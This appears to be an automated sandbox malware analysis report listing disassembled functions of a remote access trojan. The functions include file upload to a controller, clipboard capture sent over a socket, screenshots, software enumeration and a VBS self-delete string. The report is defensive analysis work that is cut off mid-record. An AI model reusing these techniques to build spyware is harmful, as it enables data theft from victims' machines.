                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                    • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                    Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63B11986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                    • Sleep.KERNEL32(00000064), ref: 00412E94
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                    • String ID: /stext "$0TG$0TG$NG$NG
                    • API String ID: 1223786279-2576077980
                    • Opcode ID: 89d1699e6d7c756e3bbe6eba3beddd77d66d6b2828719220647806e229e7841a
                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                    • Opcode Fuzzy Hash: 89d1699e6d7c756e3bbe6eba3beddd77d66d6b2828719220647806e229e7841a
                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                    Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                    • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumOpen
                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                    • API String ID: 1332880857-3714951968
                    • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                    • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                    Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                    Download Yara Rule
                    APIs
                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                    • GetCursorPos.USER32(?), ref: 0041D5E9
                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                    • ExitProcess.KERNEL32 ref: 0041D665
                    • CreatePopupMenu.USER32 ref: 0041D66B
                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                    • String ID: Close
                    • API String ID: 1657328048-3535843008
                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                    Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                    • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                    Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                    • __aulldiv.LIBCMT ref: 00408D4D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                    • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                    • API String ID: 3086580692-2582957567
                    • Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                    • Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                    Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                    • _free.LIBCMT ref: 004512FF
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00451321
                    • _free.LIBCMT ref: 00451336
                    • _free.LIBCMT ref: 00451341
                    • _free.LIBCMT ref: 00451363
                    • _free.LIBCMT ref: 00451376
                    • _free.LIBCMT ref: 00451384
                    • _free.LIBCMT ref: 0045138F
                    • _free.LIBCMT ref: 004513C7
                    • _free.LIBCMT ref: 004513CE
                    • _free.LIBCMT ref: 004513EB
                    • _free.LIBCMT ref: 00451403
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                    • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                    Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 00419FB9
                    • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                    • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                    • GetLocalTime.KERNEL32(?), ref: 0041A105
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                    • API String ID: 489098229-1431523004
                    • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                    • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                    • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                    • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                    Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                      • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                      • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                      • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                    • ExitProcess.KERNEL32 ref: 0040D9C4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-3159800282
                    • Opcode ID: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
                    • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                    • Opcode Fuzzy Hash: 915a6608449d123814c07db32fe1ac6c9b684f59cbeaa3b418ee84a827032fa7
                    • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                    Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                    • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                    • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                    • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                    Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                    • CloseHandle.KERNEL32(?), ref: 00404E4C
                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                    • String ID:
                    • API String ID: 3658366068-0
                    • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                    • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                    Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                    • GetLastError.KERNEL32 ref: 00455CEF
                    • __dosmaperr.LIBCMT ref: 00455CF6
                    • GetFileType.KERNEL32 ref: 00455D02
                    • GetLastError.KERNEL32 ref: 00455D0C
                    • __dosmaperr.LIBCMT ref: 00455D15
                    • CloseHandle.KERNEL32(00000000), ref: 00455D35
                    • CloseHandle.KERNEL32(?), ref: 00455E7F
                    • GetLastError.KERNEL32 ref: 00455EB1
                    • __dosmaperr.LIBCMT ref: 00455EB8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                    • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                    • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                    • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                    Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                    Download Yara Rule
                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                    • __alloca_probe_16.LIBCMT ref: 00453F94
                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                    • __freea.LIBCMT ref: 00454003
                    • __freea.LIBCMT ref: 0045400F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID: \@E
                    • API String ID: 201697637-1814623452
                    • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                    • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                    Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: \&G$\&G$`&G
                    • API String ID: 269201875-253610517
                    • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                    • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                    • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                    • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                    Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
                    • API String ID: 0-1267037602
                    • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                    • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                    • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                    • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                    Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                    • __dosmaperr.LIBCMT ref: 0043A8A6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                    • __dosmaperr.LIBCMT ref: 0043A8E3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                    • __dosmaperr.LIBCMT ref: 0043A937
                    • _free.LIBCMT ref: 0043A943
                    • _free.LIBCMT ref: 0043A94A
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                    • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                    Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                    • GetMessageA.USER32 ref: 0040556F
                    • TranslateMessage.USER32(?), ref: 0040557E
                    • DispatchMessageA.USER32 ref: 00405589
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                    • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                    • Opcode Fuzzy Hash: 2eb2f374b938242071c93788593a146c5cd764c3a8e17b9f296123b837d09fc8
                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                    Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: 0VG$0VG$<$@$Temp
                    • API String ID: 1704390241-2575729100
                    • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                    • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                    Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32 ref: 00416941
                    • EmptyClipboard.USER32 ref: 0041694F
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32 ref: 0041696C
                    • GlobalLock.KERNEL32 ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: !D@
                    • API String ID: 2172192267-604454484
                    • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
